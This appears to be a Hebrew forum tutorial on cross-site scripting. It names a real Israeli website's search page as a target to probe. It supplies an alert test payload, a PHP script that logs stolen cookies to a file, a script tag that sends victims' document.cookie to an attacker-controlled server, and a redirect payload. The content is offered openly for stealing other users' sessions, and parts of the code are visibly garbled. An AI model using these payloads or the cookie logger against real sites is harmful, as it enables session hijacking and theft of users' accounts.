קבל נגן אייפוד טאצ' מתנה!_ _ __בדיחות אמאש'ך _ _ __הורד משחקים ללא הגבלה כל החודש!_ _ _ _רוצים לבכות מרוב צחוק? הקליקו כאן!

XSS, מה? ואיך?



  • 1)הסבר נה זה XSS.


  • 2)שימוש XSS.


  • 3)סקריפטים XSS.



אז מה זה XSS?.
אז בעצם XSS זה פירצה מאפשרת לשתול קוד זדוני בתוך קישור תמים, או בתוך קובץ (תמונה למשל)
שלא עובר בדיקת-תוכן.



  • הקוד הזדוני יכול לבצע מספר רב של פעולות כגון גניבת ה"עוגיה" (קובץ מיוחד
    הנשתל במחשבי הגולשים ומיועד לשמירת פרטי המשתמש לצורך זיהוי אוטומטי.


  • לקשר את האתר לכתובת אחרת .


  • מקווה שהבנתם עם לא אל תמשיכו לקרוא לכו לגוגל ותחפשו חומר על XSS או תישאלו כאן בפורום.



שימוש ב XSS
למשל ניקח לדוגמא את האתר TIPO אתר גדול עם אלפי גולשים יום יום!
נלך לחיפוש http://www.tipo.co.il/apps/click/TipoIndex_Search.asp שמה יש פריצת XSS איך בודקים?
מריצים בחיפוש את הסריפט הבא:

יפה עם יש הודעה שגיאה עם המילה XSS בפנים אז יש פריצת XSS.
אבל...דרך החיפוש רוב הסיכויים שזהל א יעבוד למה זה לא שולח פרטים למסד .. אז בעצם ההודעת שגיאה תיהיה סתם צריך לחפש מקומות יותר משמעותים כמו למשל הרשמה,התחברות,פתיחת נושא,תגובה לנושא ועוד .. תחשבו לבד.
יפה זה בעצם הכל עם באתר יש פריצת XSS אתה יכול לגנוב עוגיה לקשר את העמוד לדף אחד לכתוב בעמוד דברים ועוד הרבה דברים ...



סקריפטים XSS





קוד PHP:

<script>alert("XSS");
בדיקת XSS






גניבת עוגיות



אתם צריכים שרת שלשם ישלחו העוגיות..
עכשיו פתחו בשרת שלכם קובץ בשם logfile.txt



וקובץ בשם : XSS.PHP


קוד PHP:

[right]
= "logfile.txt";
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, `a`))
{
exit;
}
else
{
if (fwrite($handle, "-r-n" . $_GET["cookie"]) === FALSE)
{
exit;
}
}
fclose($handle);
exit;
}
exit;
?>

[/right]


יפה עכשיו פשוט הסקריפט


קוד PHP:

[right]<Script>location.href=("http://www.exxxx.co.il/xss.php?cookie="+document.cookie)

[/right]


קישור לדף אחר שמים בדף איפה שהחור XSS שלכם





קוד PHP:

<script>location.href("walla.co.il");